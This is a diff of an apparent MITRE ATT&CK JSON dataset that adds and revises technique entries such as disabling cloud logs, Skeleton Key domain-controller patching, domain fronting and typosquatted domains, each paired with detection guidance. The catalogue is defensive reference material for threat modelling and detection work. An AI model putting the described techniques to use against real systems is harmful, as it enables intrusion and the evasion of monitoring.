directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise)\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\n\nAdversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.", + "id": "attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T18:18:54.959Z", + "created": "2020-10-01T02:14:18.044Z", + "x_mitre_data_sources": [ + "SSL/TLS certificates" + ], + "x_mitre_detection": "Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1596.003", + "url": "https://attack.mitre.org/techniques/T1596/003" + }, + { + "source_name": "SSLShopper Lookup", + "url": "https://www.sslshopper.com/ssl-checker.html", + "description": "SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020." + }, + { + "source_name": "Medium SSL Cert", + "url": "https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2", + "description": "Jain, M. (2019, September 16). Export & Download \u2014 SSL Certificate from Server (Site URL). Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Digital Certificates", + "description": "Before compromising a victim, adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.\n\nAdversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "id": "attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:19:15.289Z", + "created": "2020-10-02T16:58:58.738Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "external_references": [ { @@ -7454,6 +8780,16 @@ "external_id": "T1498.001", "url": "https://attack.mitre.org/techniques/T1498/001" }, + { + "external_id": "CAPEC-125", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/125.html" + }, + { + "external_id": "CAPEC-486", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/486.html" + }, { "source_name": "USNYAG IranianBotnet March 2016", "url": "https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged", @@ -7479,7 +8815,7 @@ "phase_name": "impact" } ], - "modified": "2020-03-29T01:10:52.360Z", + "modified": "2020-09-16T15:57:12.410Z", "created": "2020-03-02T20:07:18.651Z", "x_mitre_data_sources": [ "Sensor health and status", @@ -7489,7 +8825,7 @@ "Network device logs" ], "x_mitre_detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_impact_type": [ "Availability" @@ -7557,6 +8893,116 @@ ], "x_mitre_version": "2.0" }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1562.008", + "url": "https://attack.mitre.org/techniques/T1562/008" + }, + { + "source_name": "Following the CloudTrail: Generating strong AWS security signals with Sumo Logic", + "url": "https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/", + "description": "Dan Whalen. (2019, September 10). Following the CloudTrail: Generating strong AWS security signals with Sumo Logic. Retrieved October 16, 2020." + }, + { + "source_name": "Stopping CloudTrail from Sending Events to CloudWatch Logs", + "url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html", + "description": "Amazon Web Services. (n.d.). Stopping CloudTrail from Sending Events to CloudWatch Logs. Retrieved October 16, 2020." + }, + { + "source_name": "Configuring Data Access audit logs", + "url": "https://cloud.google.com/logging/docs/audit/configure-data-access", + "description": "Google. (n.d.). Configuring Data Access audit logs. Retrieved October 16, 2020." + }, + { + "source_name": "az monitor diagnostic-settings", + "url": "https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete", + "description": "Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved October 16, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Disable Cloud Logs", + "description": "An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. \n\nCloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)", + "id": "attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-10-19T16:31:34.489Z", + "created": "2020-10-12T13:52:32.846Z", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_detection": "Monitor logs for API calls to disable logging. In AWS, monitor for: StopLogging and DeleteTrail.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: Configuring Data Access audit logs) In Azure, monitor for az monitor diagnostic-settings delete.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.", + "x_mitre_data_sources": [ + "AWS CloudTrail logs", + "Azure activity logs", + "GCP audit logs" + ], + "x_mitre_contributors": [ + "Ibrahim Ali Khan", + "AttackIQ", + "Janantha Marasinghe", + "Sekhar Sarukkai; Prasad Somasamudram; Syed Ummar Farooqh (McAfee) ", + "Matt Snyder, VMware" + ], + "x_mitre_platforms": [ + "GCP", + "Azure", + "AWS" + ] + }, + { + "id": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5", + "description": "Adversaries disable a network device\u2019s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)", + "name": "Disable Crypto Hardware", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1600.002", + "url": "https://attack.mitre.org/techniques/T1600/002" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + } + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-10-21T22:37:48.503Z", + "created": "2020-10-19T19:11:18.757Z", + "x_mitre_data_sources": [ + "File monitoring" + ], + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.", + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" + }, { "external_references": [ { @@ -7614,7 +9060,7 @@ { "source_name": "Expel IO Evil in AWS", "url": "https://expel.io/blog/finding-evil-in-aws/", - "description": "Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020." + "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020." } ], "object_marking_refs": [ @@ -7631,7 +9077,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-07-07T13:49:05.345Z", + "modified": "2020-09-14T20:02:24.426Z", "created": "2020-06-24T16:55:46.243Z", "x_mitre_contributors": [ "Expel" @@ -8225,8 +9671,41 @@ ] }, { - "created": "2020-03-13T20:21:54.758Z", - "modified": "2020-03-23T21:08:40.063Z", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1078.002", + "url": "https://attack.mitre.org/techniques/T1078/002" + }, + { + "external_id": "CAPEC-560", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/560.html" + }, + { + "url": "https://technet.microsoft.com/en-us/library/dn535501.aspx", + "description": "Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.", + "source_name": "TechNet Credential Theft" + }, + { + "source_name": "Microsoft AD Accounts", + "url": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts", + "description": "Microsoft. (2019, August 23). Active Directory Accounts. Retrieved March 13, 2020." + }, + { + "url": "https://technet.microsoft.com/en-us/library/dn487457.aspx", + "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", + "source_name": "TechNet Audit Policy" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Accounts", + "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.", + "id": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "type": "attack-pattern", "kill_chain_phases": [ { "kill_chain_name": "mitre-attack", @@ -8245,52 +9724,24 @@ "phase_name": "initial-access" } ], - "type": "attack-pattern", - "id": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", - "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.", - "name": "Domain Accounts", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "modified": "2020-09-16T19:42:11.787Z", + "created": "2020-03-13T20:21:54.758Z", + "x_mitre_version": "1.1", + "x_mitre_is_subtechnique": true, + "x_mitre_permissions_required": [ + "User", + "Administrator" ], - "external_references": [ - { - "source_name": "mitre-attack", - "external_id": "T1078.002", - "url": "https://attack.mitre.org/techniques/T1078/002" - }, - { - "url": "https://technet.microsoft.com/en-us/library/dn535501.aspx", - "description": "Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.", - "source_name": "TechNet Credential Theft" - }, - { - "source_name": "Microsoft AD Accounts", - "url": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts", - "description": "Microsoft. (2019, August 23). Active Directory Accounts. Retrieved March 13, 2020." - }, - { - "url": "https://technet.microsoft.com/en-us/library/dn487457.aspx", - "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", - "source_name": "TechNet Audit Policy" - } + "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.", + "x_mitre_data_sources": [ + "Authentication logs", + "Process monitoring" ], "x_mitre_platforms": [ "Linux", "macOS", "Windows" - ], - "x_mitre_data_sources": [ - "Authentication logs", - "Process monitoring" - ], - "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.", - "x_mitre_permissions_required": [ - "User", - "Administrator" - ], - "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0" + ] }, { "external_references": [ @@ -8315,7 +9766,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Domain Controller Authentication", - "description": "Adversaries may patch the authentication process on a domain control to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication process on a domain control with the intent of creating a backdoor used to access any user\u2019s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)", + "description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user\u2019s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)", "id": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", "type": "attack-pattern", "kill_chain_phases": [ @@ -8328,7 +9779,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-03-25T20:51:30.829Z", + "modified": "2020-08-26T14:16:48.125Z", "created": "2020-02-11T19:05:02.399Z", "x_mitre_data_sources": [ "Authentication logs", @@ -8372,6 +9823,11 @@ "external_id": "T1090.004", "url": "https://attack.mitre.org/techniques/T1090/004" }, + { + "external_id": "CAPEC-481", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/481.html" + }, { "url": "http://www.icir.org/vern/papers/meek-PETS-2015.pdf", "description": "David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.", @@ -8392,9 +9848,9 @@ "phase_name": "command-and-control" } ], - "modified": "2020-06-20T20:53:20.398Z", + "modified": "2020-09-16T19:30:54.226Z", "created": "2020-03-14T23:29:19.581Z", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)", "x_mitre_data_sources": [ @@ -8547,14 +10003,14 @@ "phase_name": "command-and-control" } ], - "modified": "2020-03-12T14:45:22.784Z", + "modified": "2020-10-02T01:37:39.618Z", "created": "2020-03-10T17:44:59.787Z", "x_mitre_version": "1.0", "x_mitre_is_subtechnique": true, "x_mitre_permissions_required": [ "User" ], - "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)", + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)", "x_mitre_data_sources": [ "DNS records", "Netflow/Enclave netflow", @@ -8615,15 +10071,52 @@ ] }, { - "created": "2019-02-14T16:15:05.974Z", - "modified": "2020-03-26T16:13:21.085Z", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1590.001", + "url": "https://attack.mitre.org/techniques/T1590/001" + }, + { + "source_name": "WHOIS", + "url": "https://www.whois.net/", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020." + }, + { + "source_name": "DNS Dumpster", + "url": "https://dnsdumpster.com/", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020." + }, + { + "source_name": "Circl Passive DNS", + "url": "https://www.circl.lu/services/passive-dns/", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Properties", + "description": "Before compromising a victim, adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "id": "attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d", + "type": "attack-pattern", "kill_chain_phases": [ { "kill_chain_name": "mitre-attack", - "phase_name": "discovery" + "phase_name": "reconnaissance" } ], - "type": "attack-pattern", + "modified": "2020-10-25T22:58:22.915Z", + "created": "2020-10-02T15:46:24.670Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { "external_references": [ { "source_name": "mitre-attack", @@ -8642,7 +10135,7 @@ }, { "source_name": "Harmj0y Domain Trusts", - "url": "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ ", + "url": "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", "description": "Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019." }, { @@ -8663,6 +10156,15 @@ "name": "Domain Trust Discovery", "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)", "id": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "modified": "2020-09-17T18:26:17.858Z", + "created": "2019-02-14T16:15:05.974Z", "x_mitre_version": "1.1", "x_mitre_permissions_required": [ "User" @@ -8685,6 +10187,159 @@ ], "x_mitre_is_subtechnique": false }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1583.001", + "url": "https://attack.mitre.org/techniques/T1583/001" + }, + { + "external_id": "CAPEC-630", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/630.html" + }, + { + "source_name": "CISA MSS Sep 2020", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-258a", + "description": "CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020." + }, + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "source_name": "PaypalScam", + "description": "Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017.", + "url": "https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/" + }, + { + "source_name": "CISA IDN ST05-016", + "url": "https://us-cert.cisa.gov/ncas/tips/ST05-016", + "description": "CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020." + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domains", + "description": "Before compromising a victim, adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)", + "id": "attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-20T20:25:29.310Z", + "created": "2020-09-30T17:09:31.878Z", + "x_mitre_contributors": [ + "Wes Hurd", + "Vinayak Wadhwa, Lucideus", + "Deloitte Threat Library Team" + ], + "x_mitre_data_sources": [ + "Domain registration" + ], + "x_mitre_detection": "Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1584.001", + "url": "https://attack.mitre.org/techniques/T1584/001" + }, + { + "source_name": "ICANNDomainNameHijacking", + "description": "ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.", + "url": "https://www.icann.org/groups/ssac/documents/sac-007-en" + }, + { + "source_name": "Microsoft Sub Takeover 2020", + "url": "https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover", + "description": "Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020." + } + ], + "object_marking_refs": [ 